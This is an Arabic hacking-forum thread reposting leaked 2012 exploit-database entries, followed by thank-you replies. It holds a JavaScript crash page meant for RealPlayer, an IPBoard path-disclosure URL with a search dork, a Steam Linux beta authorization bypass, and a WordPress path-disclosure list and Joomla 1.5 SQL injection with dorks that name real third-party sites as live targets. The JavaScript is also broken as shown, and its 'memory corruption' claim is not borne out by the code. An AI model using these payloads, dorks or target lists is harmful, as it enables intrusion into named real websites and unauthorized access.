    # Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting
     
    Info :
    Save the HTML Code as p0c.html and drop/open it with Realplayer
    ABCABC........... Boom !!! ^__^
     
    -->
     
    <html>
    <head>
    <title>Memory Corruption bY KedAns-Dz</title>
    <body onload="javascript:KedAns();">
    <script language="JavaScript">
    // Builds an ever-growing string and writes it into the document.
    // What the visible code does: sixteen unescape() calls concatenate a fixed
    // literal into `puf` (as rendered here the literal is already decoded to
    // CJK characters, so the original escape sequence is not recoverable from
    // the page), then a loop triples `buffer` on every iteration
    // (buffer += buffer + buffer) and document.write()s the result.  After k
    // iterations the string is 3^(k+1) characters long, so whatever HTML
    // engine renders the page will run out of memory or throw long before i
    // reaches 999.  The header says to open the file in RealPlayer; which
    // engine that hands the page to is not visible here.  Nothing in the code
    // controls *what* is overwritten: from a defender's view this is a
    // resource-exhaustion page, and the "memory corruption" claim in the
    // header is not demonstrated by the code itself.
    // NOTE(review): `i` is assigned without var (implicit global), the
    // `buffer` declaration has no terminating semicolon, and the function's
    // closing brace is missing as rendered -- the final `}` closes only the
    // for-loop.
    function KedAns()
    {
     
    // (puf) it's just for make a buffer and Crash !
    var puf =unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
     
    document.write(puf); // Buffer1
     
    var buffer = '\x41\x42\x43' // ABC buffer
    // Exponential growth: length triples each pass.
    for(i=0; i <= 999 ; ++i)
    {
    buffer+=buffer+buffer
    document.write(buffer); // Corrupt this !!!
     
    }
     
    // [ Memory Corruption !! (*__^) ]
     

    </script>
    </head>
    </body>
    </html>
    <!--
     
    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
    # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
    # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
    # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
    # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
    #============================================================================================================ --> 
     
    # 1337day.com [2012-12-12]
    IPBoard 3.x.x/3.4 Full Path Disclosure

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    Exploit:
    admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login
     
    Dork

    intext:Community Forum Software by IP.Board
     
    Fix: turn off display_errors in php.ini.
     
    # 1337day.com [2012-12-12]
    Steam Linux Closed Beta bypass authorization

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    POC:
    0x01 Download the Steam client for Linux here: http://media.steampowered.com/client/installer/steam.deb
     
    0x02 Login to your account using the Steam Client normally
     
    0x03 There will be a message box saying that you do not have authorization. Do not click OK; use the client normally as if you were authorized.
     
    # 1337day.com [2012-12-12]
    WordPress 3.5 multiple path disclosure vulnerabilities

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    # Exploit Title: wordpress 3.5 multiple path disclosure vulnerabilities 
    # Date: [12.12.12]
    # Author: [Cyb3rboy]
    # Vendor or Software Link: [wordpress.org]
    # Version: [wordpress 3.5]
    # Category:: [webapps]
    # Google dork: [use brain ]
    # Tested on: [windows]
     
    The following paths are vulnerable to a path disclosure vulnerability in WordPress 3.5:
     
    /wp-settings.php
    POC 
    :- http://sqayasia.com/wp-settings.php
    http://www.way2blogging.org/wp-settings.php
     
    /wp-includes/admin-bar.php
    POC
    :- http://sqayasia.com/wp-includes/admin-bar.php
    http://www.way2blogging.org/wp-includes/admin-bar.php
     
     
    /wp-includes/author-template.php
    Poc
    :- http://sqayasia.com/wp-includes/author-template.php
    http://www.way2blogging.org/wp-includes/author-template.php
     
    /wp-includes/canonical.php
    Poc
    :- http://sqayasia.com/wp-includes/canonical.php
     
    /wp-includes/category-template.php
    Poc
    :- http://sqayasia.com/wp-includes/category-template.php
    http://www.way2blogging.org/wp-includes/category-template.php
     
    /wp-includes/class-wp-embed.php
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-embed.php
    http://www.way2blogging.org
     
    /wp-includes/media.php
    POc
    :- http://sqayasia.com/wp-includes/media.php
     
    /wp-includes/ms-default-constants.php
    Poc 
    :- http://sqayasia.com/wp-includes/ms-default-constants.php
    http://www.way2blogging.org
     
    /wp-includes/ms-default-filters.php
    Poc
    :- http://sqayasia.com/wp-includes/ms-default-filters.php
    http://www.way2blogging.org
     
    /wp-includes/ms-settings.php
    Poc
    :- http://sqayasia.com/wp-includes/ms-settings.php
    http://www.way2blogging.org
     
    /wp-includes/post.php
    Poc
    :- http://sqayasia.com/wp-includes/post.php
    http://www.way2blogging.org
     
    /wp-includes/rss.php
    Poc
    :- http://sqayasia.com/wp-includes/rss.php
    http://www.way2blogging.org/wp-includes/rss.php
     
    /wp-includes/user.php
    Poc
    :- http://sqayasia.com/wp-includes/user.php
    http://www.way2blogging.org/wp-includes/user.php
     
    /wp-includes/theme.php
    Poc
    :- http://sqayasia.com/wp-includes/theme.php
    http://www.way2blogging.org/wp-includes/theme.php
     
    /wp-includes/vars.php
    Poc
    :- http://sqayasia.com/wp-includes/vars.php
    http://www.way2blogging.org/wp-includes/vars.php
     
    /wp-includes/class-wp-http-ixr-client.php
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-http-ixr-client.php
     
    /wp-includes/class-wp-image-editor-gd.php
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-image-editor-gd.php
    http://www.way2blogging.org/wp-includes/class-wp-image-editor-gd.php
     
    /wp-includes/class-wp-image-editor-imagick.php
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-image-editor-imagick.php
    http://www.way2blogging.org/wp-includes/class-wp-image-editor-imagick.php
     
    /wp-includes/class-wp-xmlrpc-server.php
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-xmlrpc-server.php
    http://www.way2blogging.org/wp-includes/class-wp-xmlrpc-server.php
     
    /wp-includes/class.wp-scripts.php
    Poc
    :- http://sqayasia.com/wp-includes/class.wp-scripts.php
    http://www.way2blogging.org/wp-includes/class.wp-scripts.php
     
    /wp-includes/class.wp-styles.php
    Poc
    :- http://sqayasia.com/wp-includes/class.wp-styles.php
    http://www.way2blogging.org/wp-includes/class.wp-styles.php
     
    /wp-includes/comment-template.php
    Poc
    :- http://sqayasia.com/wp-includes/comment-template.php
    http://www.way2blogging.org/wp-includes/comment-template.php
     
    /wp-includes/default-filters.php
    Poc
    :- http://sqayasia.com/wp-includes/default-filters.php
    http://www.way2blogging.org/wp-includes/default-filters.php
     
    /wp-includes/default-widgets.php
    Poc
    :- http://sqayasia.com/wp-includes/default-widgets.php
    http://www.way2blogging.org/wp-includes/default-widgets.php
     
    /wp-includes/feed-atom-comments.php
    Poc
    :- http://sqayasia.com/wp-includes/feed-atom-comments.php
    http://www.way2blogging.org/wp-includes/feed-atom-comments.php
     
    /wp-includes/feed-atom.php
    Poc
    :- http://sqayasia.com/wp-includes/feed-atom.php
    http://www.way2blogging.org/wp-includes/feed-atom.php
     
    /wp-includes/feed-rdf.php
    Poc
    :-http://sqayasia.com/wp-includes/feed-rdf.php
    http://www.way2blogging.org/wp-includes/feed-rdf.php
     
    /wp-includes/feed-rss.php
    Poc
    :-http://sqayasia.com/wp-includes/feed-rss.php
    http://www.way2blogging.org/wp-includes/feed-rss.php
     
    /wp-includes/feed-rss2-comments.php
    Poc
    :- http://sqayasia.com/wp-includes/feed-rss2-comments.php
    http://www.way2blogging.org/wp-includes/feed-rss2-comments.php
     
    /wp-includes/feed-rss2.php
    Poc
    :- http://sqayasia.com/wp-includes/feed-rss2.php
    http://www.way2blogging.org/wp-includes/feed-rss2.php
     
    /wp-includes/functions.php
    Poc
    :- http://sqayasia.com/wp-includes/functions.php
    http://www.way2blogging.org/wp-includes/functions.php 
     
    # 1337day.com [2012-12-12]
    Joomla all v1.5 Error Based SQL Injection Vulnerability

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm Caddy-dz member from Inj3ct0r Team                 1
    1               #########################################              0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
     
    ####
    # Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
    # Author: Caddy-Dz
    # Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
    # E-mail: [email protected] 
    # Category:: webapps
    # script home : http://joomla.com
    # Dork : inurl:option=com_user
    # Security Risk: critical
    # Tested on: Back|Track 5 KDE / French
    ####
    # this was written for educational purpose only. use it at your own risk.
    # the author will not be responsible for any damage caused! the user assumes all responsibility 
    # intended for authorized web application pentesting only!
     
    // Description :
     
    the affected component is /com_user/ in all joomla v1.5
    P.S.: you can find the version by opening the target's page source and searching for "joomla"; the version is shown there :-)
     
    // Exploit :
     
    http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
    http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection)   [replacing id number by character]
     
    #  private YouTube link; only people who have the link can view it : http://www.youtube.com/watch?v=g0QcjxIb68I
     
    // Demo :
     
    http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
    http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
    http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
    http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
    http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
    http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid='
     
     
    # Greets To : ==============================================================================
    #  The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates , 
    #  D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria
    #  ... And All Algerian Hax0rs
    ============================================================================================ 
     
    # 1337day.com [2012-12-12]
     
  2. روبورت1


    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. ĴŎђЙ cĘŇĄ


    رد: تسريب جميع ثغرات 1337day المعروضة للبيع

    وعليكم السلام ورحمه الله وبركاته

    يعطيك العافيه ي بطل
     
  4. أبـو سـعيد


    رد: تسريب جميع ثغرات 1337day المعروضة للبيع

    الله يعيطك العافيه , الله يجزاك كل خير ~​
     